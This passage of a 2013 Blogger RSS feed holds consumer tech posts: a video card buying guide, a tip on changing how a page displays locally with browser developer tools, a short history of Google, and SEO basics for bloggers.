/&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;HDMI(High-Definition Multimedia Interface): &lt;/b&gt;HDMI cables carry both video and surround sound.&lt;/span&gt;&lt;/span&gt;      &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;An HDMI port is handy if you plan on watching your computer on a High Definition TV set. This figure shows an HDMI port on a video card(left), cable connector(middle), and monitor(right).&lt;/span&gt;&lt;/span&gt;      &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;img src="http://media.wiley.com/Lux/77/225977.image4.jpg" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;   &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: large"&gt;&lt;strong&gt;Deciding what video card features are worth your money&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;Video cards come with oodles of options. Here’s a rundown on the things that drive a video card’s price up or down:&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Video memory: &lt;/b&gt;More memory means more detailed images, leading to higher price tag. Windows&amp;#160; runs best on video cards with at least 256MB of video memory, more memory is better.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Brand:&lt;/b&gt; Two companies battle it out for the graphic market, so don’t be surprised to see a wide variety of brands selling what appears to be the same type of card. Off-brand cards can save money, but sometimes ship with incomprehensible manuals, little documentation, and no technical support.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Graphics chip: &lt;/b&gt;Because the latest chips carry a premium price, buy a slightly older model to save some money. For up-to-date tips, visit &lt;a title="Tom&amp;#39;s hardware" href="http://www.tomshardware.com/" target="_blank"&gt;Tom’s Hardware&lt;/a&gt; and read their “Best Graphics Cards for the Money” article, updated monthly.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Dual-monitor support: &lt;/b&gt;Most video cards now supports two ports, meaning you can plug two monitors into them. A few even offer three ports.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Directx: &lt;/b&gt;Programmers use this special software to create advanced visual tricks. For the best experience, Windows 7 requires video that can handle DirectX version 11.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Noise: &lt;/b&gt;Video cards generate a lot of heat, so most of them include built-in fans. Cheap cards often come with noisy fan, know as “leaf-blowers.” Quieter cards cost more.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;Resolution: &lt;/b&gt;The higher the resolution, the more information you can pack onto your monitor at once. And, of course, the higher the price.&lt;/span&gt;&lt;/span&gt;      &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;To save money, check your monitor’s manual (or do a Google search for its make and model) to see its highest resolution. Then buy a card that meets that resolution because any higher resolution would be wasted.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;    &lt;div style="text-align: left" dir="ltr" trbidi="on"&gt;     &lt;div style="text-align: center; clear: both" class="separator"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;a style="margin-left: 1em; margin-right: 1em" href="http://www.mylivesignature.com/" target="_blank"&gt;&lt;font size="3"&gt;&lt;img style="border-bottom: 0px; border-left: 0px; background: none transparent scroll repeat 0% 0%; border-top: 0px; border-right: 0px" src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" /&gt;&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;   &lt;/div&gt; &lt;/div&gt;  </description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Editing contents of a webpage in browser</title><link>https://snacksofhacks.blogspot.com/2013/11/editing-contents-of-webpage-in-browser.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 26 Nov 2013 17:07:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1200905338962896507</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt; &lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjIDMIeFFQIhtjfNgvZZpVQJYr4Y3kNxYvX1iom2v2k5tfCRS3YK7W3_WsiZZTbTxA9bR4f1UiP3QSsqWRkeDhz4pGzkV_0IgVytBm9gD6poacv5GRar3WN1VYQm6HCmFjlEHjvmoyMNE/s1600/screenshot_5.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjIDMIeFFQIhtjfNgvZZpVQJYr4Y3kNxYvX1iom2v2k5tfCRS3YK7W3_WsiZZTbTxA9bR4f1UiP3QSsqWRkeDhz4pGzkV_0IgVytBm9gD6poacv5GRar3WN1VYQm6HCmFjlEHjvmoyMNE/s320/screenshot_5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;Hi, friends after a long time I have came up with a cool developer post which is useful for every blogger or hacker.I've discovered it and did a research on it and now I'm here to reveal it to you.Most of us uses many browsers to surf the web, and many of us don't now about "Developer Tools" provided in them but they are very often used by web developers or designers and also hackers.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;Today I'm gonna explain you how to edit contents of a webpage exclusively..&lt;/span&gt;&lt;br /&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;nbsp;First of all we have to select a browser, I use "mozilla firefox" in this b'coz it is most often used by all the developers and has a neat security. Using this browser you are going to edit or changing the elements in "facebook".&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: #e06666;"&gt;It is just for educational purpose only not for changing the original sites contents. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;suppose that my facebook page looks like this I can edit it and change it look like another kind of stuff..&lt;/span&gt;&lt;br /&gt; &lt;div style="text-align: center;"&gt; &lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;nbsp;Before&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt; &lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3fcf_MqHGIpC_KKH63KKdgHqeMtShrJtRoFEBIwfSqnQQfjcQPXi4umQYUiTtQhBMtbfyZj6T_hoDJSQccywk12FARwhb9Kvcce16FEiNHC6tAVw5DfNmzIOFl3zhLsVV_ynpwiEaGk/s1600/screenshot_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3fcf_MqHGIpC_KKH63KKdgHqeMtShrJtRoFEBIwfSqnQQfjcQPXi4umQYUiTtQhBMtbfyZj6T_hoDJSQccywk12FARwhb9Kvcce16FEiNHC6tAVw5DfNmzIOFl3zhLsVV_ynpwiEaGk/s320/screenshot_1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt; &lt;div class="" style="clear: both; text-align: center;"&gt; &lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;After&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;br /&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt; &lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl_0KgKYpre-mCDjGW733Sx377czEbZUWFQTdrOrHGhPJA0Az861dtGTbjYJCwBHkVsVMWyRb0RjbwuaDGy4IQoFx5phQdHTvUTGrHkVxvcHXHC_XAZCtB7KrQy_thGe8c79kB-jncYyM/s1600/screenshot_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl_0KgKYpre-mCDjGW733Sx377czEbZUWFQTdrOrHGhPJA0Az861dtGTbjYJCwBHkVsVMWyRb0RjbwuaDGy4IQoFx5phQdHTvUTGrHkVxvcHXHC_XAZCtB7KrQy_thGe8c79kB-jncYyM/s320/screenshot_2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt; This can be done by using developer tools in any browser but you have to know minimum basic topics on html to do this.&lt;/span&gt;&lt;br /&gt; &lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;I did this now and the steps are:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;--&amp;gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Open the site you wan to edit in a browser "I used Mozilla Firefox" and&amp;nbsp;&amp;nbsp; select the element you want to change.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;--&amp;gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Point on the element you want to edit and click on "inspect element" and new window popups showing the page code.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt; &lt;span style="color: #ea9999;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBjZTwAr1puCOXWFCGOgEMlaZjojoNH-ga7Pm4lMCKPCwpedkp0xm8WDi7XQCBgXViD7Jz0nOx7sUmwp0P1T7c1AtEwuxd1RKIi5ZOelnBPsWpv8xeL_eU8ZPK7z0wVKMBZTJwBz-ySQ/s1600/screenshot_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBjZTwAr1puCOXWFCGOgEMlaZjojoNH-ga7Pm4lMCKPCwpedkp0xm8WDi7XQCBgXViD7Jz0nOx7sUmwp0P1T7c1AtEwuxd1RKIi5ZOelnBPsWpv8xeL_eU8ZPK7z0wVKMBZTJwBz-ySQ/s400/screenshot_4.png" style="cursor: move;" width="400" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt; &lt;span style="color: #ea9999;"&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;--&amp;gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Now head on to the right side box and that was in "CSS" script you can edit it's values and also insert your own values.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="color: #ea9999;"&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;--&amp;gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Do it at your own risk don't edit any password fields or confidential fields, doing that can be risky.....&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="color: #ea9999;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;If any doubts you can comment down here or contact me personally on my &lt;a href="https://docs.google.com/spreadsheet/viewform?formkey=dFhZa3RUc2dRczkwQU5qVkVpcnNUMkE6MA" target="_blank"&gt;contact us page&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt; &lt;a href="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="color: #ea9999;"&gt;&lt;img border="0" src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: none repeat scroll 0% 0% transparent; border: 0px none ! important;" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;/div&gt;  </description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjIDMIeFFQIhtjfNgvZZpVQJYr4Y3kNxYvX1iom2v2k5tfCRS3YK7W3_WsiZZTbTxA9bR4f1UiP3QSsqWRkeDhz4pGzkV_0IgVytBm9gD6poacv5GRar3WN1VYQm6HCmFjlEHjvmoyMNE/s72-c/screenshot_5.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>History of gOoGle</title><link>https://snacksofhacks.blogspot.com/2013/05/history-of-google.html</link><category>FaCts</category><category>MuSt C</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Thu, 23 May 2013 13:54:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-3449010917601208849</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://edudemic.com/wp-content/uploads/2013/01/Google.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"&gt;&lt;img border="0" height="232" src="http://edudemic.com/wp-content/uploads/2013/01/Google.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #0b5394; font-size: x-large;"&gt;G&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;oogle,the leading search engine worldwide,was founded in 1998 by Stanford University graduate students Larry Page and Sergei Brin.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;Sergei Brin and Larry Page&lt;/span&gt;&lt;br /&gt;
&lt;img height="245" src="http://www.seotraininguk.org.uk/seo-training-images/larry-page-sergey-brin1.jpg" width="320" /&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;W&lt;span style="color: #999999;"&gt;hile at Stanford in 1996,Page and Brin began developing a search engine they eventually entititled BackRub. This search engine was designed to look at the connecting links between web pages in order to determine a site's authority. In 1998,Page and Brin set up their first data center in Page's dorm.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;W&lt;span style="color: #999999;"&gt;ith the encouragement of fellow Stanford alum David Filo, who started Yahoo a few years earlier, Page and Brin decided to start a company and started looking for investors to back them. Andy Bechtolsheim, one of the founders of Sun Microsystems, invested $100,000 in the company after receiving a demo of their search technology. Eventually the pair raised over $1M.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://cdn.freshome.com/wp-content/uploads/2011/01/Google-Office-Freshome10.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="213" src="http://cdn.freshome.com/wp-content/uploads/2011/01/Google-Office-Freshome10.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;G&lt;span style="color: #999999;"&gt;oogle, Inc. was established on September 7, 1998 in a friend's garage in Menlo Park, California. Page and Brin hired their first employee, Craig Silverstein, who was later to become Google's Director of Technology.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;I&lt;span style="color: #999999;"&gt;n their humble beginnings, Google served over 10,000 queries a day and quickly gained a reputation as a trustworthy source of information. By 1999, it was serving 500,000 queries a day and the company moved from the unassuming four walls of a garage to the now mega Googleplex headquarters in Mountain View, California.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;G&lt;span style="color: #999999;"&gt;oogle achieved praise and publicity as news spread rapidly through online and offline media as well as their receipt of numerous awards and recommendations. Their audience continued to grow along with their reputation for effectiveness, relevance, speed and reliability.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;I&lt;span style="color: #999999;"&gt;n 2000, Google replaced Yahoo's own internal search engine as the provider of supplementary search results on Yahoo. Now, with more than 50% share of the total search market, Google provides search results for numerous search engines on the web.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;G&lt;span style="color: #999999;"&gt;oogle has become all-important to both search engines and search engine optimization specialists alike. The other search engines have a tendency to mimic any algorithmic changes made by Google.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;L&lt;span style="color: #999999;"&gt;ikewise, search engine optimization specialists continually study the changes as well in order to provide their clients with the best search engine rankings.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span style="font-family: inherit; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #ea9999; font-size: large;"&gt;Source: internet&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: large;"&gt;Your blogger&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" target="_blank"&gt;&lt;span style="color: #444444; font-size: large;"&gt;&lt;img src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Search Engine Optimization basics</title><link>https://snacksofhacks.blogspot.com/2013/05/search-engine-optimization-basics.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 13 May 2013 16:16:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1262749852903325660</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC-rDKZ0v5iNt3zcqfCEp3IUKS6upBskqoLchLGDZACujRj8o68e63XYJeM7FiJ9-kpaUi54Mkll9zm-kba50oDdXG0u1qDHagCUO_cAH4XHcGOmSyZqAGPjEGDvIWxGN733pUSqGg9Gcc/s1600/SEO-tips+by+Google.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="SEO tips for beginners" border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC-rDKZ0v5iNt3zcqfCEp3IUKS6upBskqoLchLGDZACujRj8o68e63XYJeM7FiJ9-kpaUi54Mkll9zm-kba50oDdXG0u1qDHagCUO_cAH4XHcGOmSyZqAGPjEGDvIWxGN733pUSqGg9Gcc/s320/SEO-tips+by+Google.jpg" style="background-color: white; color: #333333; font-family: Verdana, arial; font-size: x-large; line-height: 20.796875px; padding: 10px; text-align: center;" title="SEO tips for beginners" width="320" /&gt;&lt;/a&gt;&lt;span style="font-size: x-large;"&gt;B&lt;/span&gt;&lt;span style="color: #666666; font-size: large;"&gt;logging is more than just about creating an online space for yourself and putting up content there.You have to be the best in order to compete with the best.But even becomes less important when it comes to optimizing your blog for search engines.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-size: large;"&gt;After all,you want your great content to reach your potential readers,right?Other wise,what's the point?This is the part where Search Engine Optimization(SEO) come in.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-size: large;"&gt;In this post,I'll take you move on,make sure you've covered the following parts in our blogging series.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;hr /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;b&gt;Google Webmaster tools&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;hr /&gt;
&lt;br /&gt;
&lt;span style="color: #666666; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Google webmaster Tools is your friend! Whether you like Google oR not,you will have to sign up for Google Webmaster Tools(GWT).GWT is basically a dashboard wher you can not only get yourself verified as an official owner of your site,but also get access to a lot of tools,features,and reports.With GWT,you can change how GoOgLe sees your website,and even receive messages from Google regarding updates,and errors found on your website.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #666666; font-size: large;"&gt;with GWT,you can:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;View crawl errors,crawl stats,blocked url's index&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;Fetch as Google - Pretty handy for fetching data for your website and submitting it to index to ensure that it's indexed more quickly.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;View search queries,and interenal/external links.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;Submitting sitemap.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;...and much more.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;b&gt;Submitting Sitemap
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;hr /&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; The first thing to do after making a proper website or blog is to create a sitemap,and submit it to Google.A sitemap is basically a listing of the contents of your blog,sort of like a table of contents.It needs to be submitted to search engines so they know what content to find on your blog.We recommend that you put up some content first before creating and submitting a sitemap.Around 10 posts on your blog should be enough to get you started.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;When you submit a sitemap,search engines use the data on that sitemap to locate your site and your data,and index it.You might have noticed that your site didn't appear on Google after you created it.Well,to get it into search results,Google first needs to index it.And to make Google index it soon,you submit a sitemap.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;To submit a sitemap,you first need a sitemap generator.For blogger blogs,you can use the tool on the following link.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="color: #3d85c6; font-size: large;"&gt;Blogger sitemap generator&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: #444444; font-size: large;"&gt;If you're using wordpress,the you just need a plugin called "Google XML Sitemaps".Either way,it's a simple process and only takes a few simple instructions.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;hr /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;b&gt;Keep monitoring your rank and statistics&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;hr /&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Now that you're a blogger and have started generating good content,it's time you should start monitoring your success.Keep track of your PageRank,which comes out every three month. The last one came in &amp;nbsp;February this year.You should also keep a check on your Alexa Toolbar ranking.For monitoring your website statistics,you should use Google Analytics.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
